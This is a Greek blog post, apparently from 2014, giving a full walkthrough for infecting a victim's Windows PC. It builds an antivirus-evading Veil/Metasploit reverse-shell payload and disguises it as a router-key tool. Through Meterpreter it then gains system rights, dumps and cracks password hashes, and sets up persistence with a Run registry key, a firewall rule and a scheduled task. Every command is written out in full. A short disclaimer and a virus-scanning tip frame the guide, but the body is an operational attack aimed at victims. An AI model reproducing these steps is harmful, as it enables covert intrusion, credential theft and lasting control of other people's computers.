ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Κυριακή 13 Απριλίου 2014

Πως εισβαλουμε σε ενα υπολογιστη (Armitage + Veil + iexpress)



Τι θα χρειαστειτε;

1.Kali linux
2.windows

Αυτος ο οδηγος εχει 100% αποτελεσματα γιαυτο μην τον δοκιμασετε σε μη εξουσιοδοτημενα συστηματα

{Λογο αναβαθμισεις του kali linux για να κανετε εγκατασταση του veil
γραψτε σε ενα τερματικο 
git clone https://github.com/Veil-Framework/Veil-Evasion.git
μετα
cd Veil-Evasion
./Veil-Evasion.py
και πατηστε y για να γινει η εγκατασταση
οταν τελειωσει γραφετε παλι ./Veil-Evasion.py
και ακολουθειτε τα βηματα μετα την εγκατασταση}

Ανοιγουμε ενα τερματικο και γραφουμε

apt-get update
 
μετα 
 
apt-get install Veil
 
μετα γραφουμε 
*αν σας γραψει οτι δεν βρισκει το Veil
τοτε γραψτε σε ενα τερματικο
nano /etc/apt/sources.list
και βαζετε μεσα αυτες τις γραμμες
 
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
πατατε ctrl+x μετα y και enter
παλι γραφετε apt-get update και μετα apt-get install Veil 
 
μετα γραφουμε  
 
cd /usr/share/veil-evasion/setup
 
και ./setup/sh
 

θα μας εμφανισει να εγκαταστησουμε python κτλ εμεις παταμε συνεχεια next
μεχρι να τελειωσει η εγκατασταση
*αν σας εμφανισει τετραγωνακια στις επιλογες δλδ 
καπως ετσι ❒ ❒ ❒ ❒ ❒ ειναι λογω Ελληνικης γλωσσας
(πχ αν εχετε Αγγλικα τα kali linux δεν θα σας το εμφανισει αυτο),
εσεις ακολουθειτε
κανονικα την εγκατασταση.*το μεσαιο κουτακι ειναι η επιλογη next
 
πχ
 


τωρα για να τρεξουμε το Veil απλα γραφουμε σε ενα τερματικο 

veil-evasion  
εγω σε αυτο τον οδηγο θα σας δειξω πως το Veil 
φτιαχνει εναν 100% FUD (Full Undetectable) ιο
 
οποτε γραφουμε 19 (python/shellcode_inject/aes_encrypt)
 

τωρα γραφουμε generate

επιλεγουμε 1
παταμε enter * αν θελουμε καποιο αλλο payload παταμε το πληκτρο tab μας τα εμφανιζει και το γραφουμε

βαζουμε την ip μας και την θυρα μας


και παταμε παλι enter


θα μας εμφανισει [*] Generating shellcode...

μετα δινουμε την ονομασια που θα εχει το εκτελεσιμο αρχειο μας
πχ molismeno

επιλεγουμε 1


και αρχιζει να μας δημιουργει και να κρυπτογραφει τον ιο μας (το payload)

οταν τελειωσει θα μας εμφανισει αυτο


το αρχειο που θα στειλουμε στο θυμα μας βρισκετε στην διαδρομη
/root/veil-output/compiled/

για να δουμε αν ο ιος μας ειναι αορατος προς τα antivirus απλα παταμε enter 
και γραφουμε checkvt θα μας εμφανισει οτι δεν βρεθηκε κανενας ιος


και κανενα antivirus δεν θα το εντοπισει
αν ομως ανεβασω το αρχειο στο virustotal 
θα δειτε οτι το εντοπισαν 4 antivirus

αν κοιταξετε καλυτερα αυτα τα antivirus που εντοπισαν τον ιο δεν ειναι γνωστα


 και αν γραψουμε στο veil checkvt θα δουμε οτι εντοπισε το hash 
με συνεπεια αν το θυμα μας κανει καποια αναβαθμιση το antivirus του τοτε θα εντοπισει και τον ιο μας


Πριν το στειλουμε στο θυμα μας γραφουμε σε ενα τερματικο
msfconsole -r  /root/veil-output/handlers/molismeno.rc

η ανοιγουμε το armitage που ειναι η γραφικη μορφη του metasploit

εγω θα σας δειξω με το armitage

οποτε πηγαινουμε
Εφαρμογες- Kali linux-Exploitation Tools-Network Exploitation-armitage
*αν δεν σας τρεξει απλα πηγαινετε Εφαρμογες- Kali linux-System Services-Metasploit επιλεγετε community / pro start και μετα παλι τρεχετε το armitage

επιλεγουμε connect


επιλεγουμε yes


τωρα πηγαινουμε στις επιλογες πανω δεξια
 armitage-Listeners-reverse(wait for)
και βαζουμε την θυρα που βαζουμε την θυρα που βαλαμε στο veil δλδ 888


τωρα στελνουμε με δολο στο θυμα μας το αρχειο
οταν ανοιξει το αρχειο θα μας ανοιξει μια συνεδρια (session)

 απο εκει και περα εχετε προσβασει στον υπολογιστη του θυματος με δικαιωματα χρηστη
επειδη ομως αυτη η συνεδρια ειναι απο το αρχειο που  στειλαμε στο θυμα αν το στειλουμε ετσι δεν θα εμφανιστει κατι στο θυμα οποτε θα το σβησει
αν το σβησει θα χασουμε την συνεδρια
για να μην χασουμε την συνεδρια πρεπει να δελεασουμε το θυμα να μην σβησει το αρχειο μας
οποτε πρεπει να το κανουμε bind δλδ να το ενωσουμε με ενα προγραμμα που θα ενδιαφερει το θυμα
δεν βρηκα δυστυχως καποιο αλλο προγραμμα linux που να κανει bind
οποτε θα χρησιμοποιησουμε τα windows για να το κανουμε αυτο
*το veil μπορει να το κανει αλλα δεν μου δουλευε καλα.επισης το msfencode το οποιο μπορειτε να φτιαξετε ιο μαζι με ενα προγραμμα αλλα μερικα antivirus το εντοπιζουν
η εντολη ειναι
 msfpayload windows/meterpreter/reverse_tcp LHOST=η ip σου LPORT=θυρα R | msfencode -t exe -x /usr/share/metasploit-framework/data/templates/προγραμμα.exe -k -o /root/Desktop/Ενωμενο.exe -e x86/shikata_ga_nai -c 9

πρεπει να βαλετε το προγραμμα που θελετε να ενωσετε τον ιο στην διαδρομη 
/usr/share/metasploit-framework/data/templates/
-k για να μην επιρεασει το προγραμμα και να δουλευει
-o διαδρομη που θα εξαγει το ενωμενο αρχειο δλδ ιος και προγραμμα
-e ειδος κρυπτογραφισεις με την εντολη (msfencode -l θα δειτε ποιες εχει)
 -c ποσες φορες να το κρυπτογραφισει
-t σε τι μορφη να εξαγει το ενωμενο αρχειο

Οποτε μεταφερουμε τον ιος μας δλδ το αρχειο molismeno.exe στα windows (με ενα στικακι)

βρισκουμε ενα προγραμμα και εικονιδιο απο το διαδικτυο που θα ενδιαφερει το θυμα μας η τα θυματα και τα κατεβαζουμε
για να κατεβασετε εικονιδια πατηστε εδω

πχ εγω διαλεξα το Thompsonkey 
ενα προγραμμα το οποιο  βρισκει εργοστασιακα κλειδια απο Thompson router
μετα κατεβαστε  και το icon changer απο εδω
και καντε το εγκατασταση

εχουμε εδω στην επιφανεια εργασιας τα αρχεια μας  τον ιο ,το προγραμμα και το εικονιδιο


τωρα πηγαινουμε στο start κατω δεξια ,γραφουμε iexpress και επιλεγουμε να ανοιξει

θα δουμε αυτο
επιλεγουμε Create new Self Extraction Directive file


επιλεγουμε Extract files and run an installation command


δινουμε μια ονομασια που θελουμε πχ


επιλεγουμε No prompt


επιλεγουμε Do not display a licence


επιλεγουμε add και βαζουμε και τα 2 αρχεια δλδ τον ιο (molismeno.exe) και thompsonkey
 πανω που λεει install βαζουμε τον ιο μας και κατω που λεει post το προγραμμα μας

επιλεγουμε Default


επιλεγουμε No message η επιλεγουμε Display message και γραφουμε κατι αναλογο με το προγραμμα

*θα καταλαβετε στο τελος του οδηγου γιατι επελεξα να γραψω αυτο το μηνυμα*
επιλεγουμε Hide File κτλ μετα Browse ,γραφουμε το ονομα του αρχειου πχ WifiFinder και την συγκεκριμενη διαδρομη που θελουμε να αποθηκευτει

επιλεγουμε no restart


επιλεγουμε do not save

επιλεγουμε επομενο και θα μας δημιουργησει το "προγραμμα" μας


στην επιφανεια εργασιας τωρα θα εχουμε το ενωμενο αρχειο, τον ιο και το εικονιδιο

τωρα για να αλλαξουμε εικονιδιο στο "προγραμμα" μας ,ανοιγουμε το icon changer
επιλεγουμε Files και ok


επιλεγουμε το "προγραμμα" μας


μετα επιλεγουμε εικονιδιο και επιλεγουμε set


επιλεγουμε Change embedded file icon


και τελος τωρα στην επιφανεια εργασιας μας στην οποια εχουμε το ενωμενο αρχειο WifiFinder
Αυτο θα στειλουμε στο θυμα μας


 Τωρα παμε πισω στα kali linux και μεταονομαζουμε τον ιο απο molismeno.exe σε srvhost.exe (στην διαδρομη /root/veil-output/compiled/ θα το βρουμε)
πηγαινουμε στα kali linux ανοιγουμε το armitage και το βαζουμε να ακουει στην θυρα που εχετε βαλει εσεις στο veil
στελνουμε το αρχειο στο θυμα μας οταν το ανοιξει θα μας δωσει συνεδρια

Δυστυχως ομως εμεις δεν θα μπορουμε να εχουμε για παντα αυτη την συνεδρια καθως οταν το θυμα κανει μια επαννεκινηση η κλησει τον υπολογιστη η εστω αποσυνδεθει με το διαδικτυο τοτε θα χασουμε την συνεδρια
οποτε πρεπει να περιμενουμε ποτε παλι θα τρεξει το αρχειο για να εχουμε συνεδρια
αυτο δεν ειναι καθολου πρακτικο
Η λυση ειναι να αποκτησουμε μονιμη προσβαση στον υπολογιστη του

Το ποιο κατω παραδειγμα εχει δοκιμαστει σε πραγματικες συνθηκες

οποτε το θυμα ανοιγει το αρχειο αλλα δεν του εμφανιζετε το thompsonkey μεχρι να κανετε εσεις migrate now επισης δεν μπορει να το διαγραψει γιατι χρησιμοποιειτε
και του εμφανιζετε αυτο


οποτε εμεις επιλεγουμε με δεξι κλικ στο θυμα meterpreter -Access migrate now με του που δουμε οτι εχουμε συνεδρια

θα μας δημιουργησει μια διεργασια notepad.exe και θα μεταφερθει εκει η συνεδρια μας
τωρα στο θυμα θα του εμφανιστει η εφαρμογη thompsonkey και θα μπορει να σπασει ασυρματα δικτυα κτλ

εμεις ομως συνεχιζουμε.......

επιλεγουμε Meterpreter - Interact - Meterpreter Shell


και γραφουμε sysinfo για να δουμε τι συστημα εχει το θυμα
μετα getuid για να δουμε τι δικαιωματα εχουμε οπως βλεπουμε εχουμε δικαιωματα χρηστη

γραφουμε getsystem και μετα getuid και βλεπουμε οτι εχουμε δικαιωματα συστηματος


 γραφουμε getprivs και βλεπουμε οτι εχουμε ολα τα προνομια


με αυτα τα δικαιωματα  θα μπορουμε να εχουμε μονιμη προσβαση στο θυμα δλδ να ανεβασουμε τον ιο μας και να τον γραψουμε στην registry των windows

οποτε με την εντολη

upload /root/veil-output/compiled/srvhost.exe C:\\windows\\system32 

ανεβαζουμε καθαρο τον ιο στο θυμα μας

και 

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\srvhost.exe'

 

* -Ldp βαζουμε την θυρα μας
γραφουμε τον ιο στην registry του θυματος

τωρα οταν το θυμα ξεκιναει τον υπολογιστη του θα ενωνετε με εμας
*αν ομως το θυμα εχει ανοιξει τον υπολογιστη του πριν βαλουμε να ακουμε με το armitage τοτε δεν θα μπορουμε να εχουμε συνεδρια με το θυμα οποτε πρεπει
να βαλουμε μια προγραμματισμενη εργασια  καθε 2 λεπτα να τρεχει τον ιο μας με αποτελεσμα να μας δημιουργησει συνεδρια

οποτε πηγαινουμε meterpreter Access-Dump hashes -registry method για να παρουμε τους κωδικους που ενωνετε ο χρηστης με τα windows


θα μας εμφανισει τα usernames και τα hashes


εμεις τωρα τα θελουμε σε καθαρη μορφη οποτε πηγαινουμε πανω δεξια στις επιλογες του armitage ,επιλεγουμε View και credentials


τωρα επιλεγουμε Crack Passwords
θα μας εμφανισει ενα παραθυρακι και θα πατησουμε Launch
οταν σπασει τους κωδικους θα μας εμφανισει αυτο


δλδ το ονομα χρηστη ειναι user και κωδικος 271288
και για Administrator ειναι κενο
αν θελουμε μπορουμε να γραψουμε κατευθειαν στο meterpreter shell wdigest
και να μας βγαλει τους κωδικους


τωρα γραφουμε στο meterpreter shell την εντολη shell για να μας παει στο cmd prompt του θυματος


γραφουμε
netsh firewall add portopening TCP 888 "Service Firewall" ENABLE ALL

ετσι ωστε να προωθησει το firewall των windows την θυρα 888

και την εντολη ετσι ωστε να τρεχει τον ιο μας καθε 2 λεπτα

SchTasks /Create /RU user /RP 271288 /SC MINUTE /MO 2 /TN WindowsScan /TR "\"C:\windows\system32\srvhost.exe""

/RU ονομα χρηστη
/RP κωδικος χρηστη
/ΜΟ καθε 2 λεπτα
/TN ονομα προγραμματισμενης εργασιας
/TR τι θα τρεχει η εργασια

επειδη εχει ελληνικα windows το θυμα θα μας εμφανισει αυτο


οποτε τωρα για να εξακριβωσουμε αν οντως εχουμε προγραμματισει την εργασια γραφουμε schtasks και κοιταμε για την προγραμματισμενη εργασια WindowsScan

οπως βλεπουμε γραψαμε επιτυχως την προγραμματισμενη εργασια

τωρα οποιδηποτε στιγμη ανοιξετε το armitage και βαλετε να ακουει πχ στην θυρα 888 θα εχετε συνεδρια.

*υπαρχει περιπτωση να μην μπορειτε να παρετε δικαιωματα συστηματος με την εντολη getsystem  οποτε γραφετε δεξια στο armitage bypassuac ρυθμιζετε την θυρα σας και την ip και επιλεγετε Launch 
αν ειναι ευαλωτο το συστημα τοτε θα σας ανοιξει καινουργια συνεδρια με δικαιωματα συστηματος αλλιως περιμενε οταν το θυμα τρεξει το προγραμμα και το κλεισει τοτε θα δει το μηνυμα που του λεει να το τρεξει σαν διαχειριστης κτλ κοιταξτε πανω στο iexpress (βεβαια υπαρχει και αλλος τροπος που θα πρεπει να τον ψαξετε στο διαδικτυο)

Πως θα προστατευτειτε;

Ποτε μην καταβαζετε αγνωστα αρχεια και αν τα κατεβασετε τοτε πριν τα ανοιξετε παντα να τα σκαναρετε στο virustotal δειτε προηγουμενο οδηγος πως
Επισης μπορειτε να τρεξετε οποιδηποτε προγραμμα με το sandboxie το οποιο  απομονωνει το προγραμμα με το συστημα σας κατεβαστε εδω





Δεν υπάρχουν σχόλια: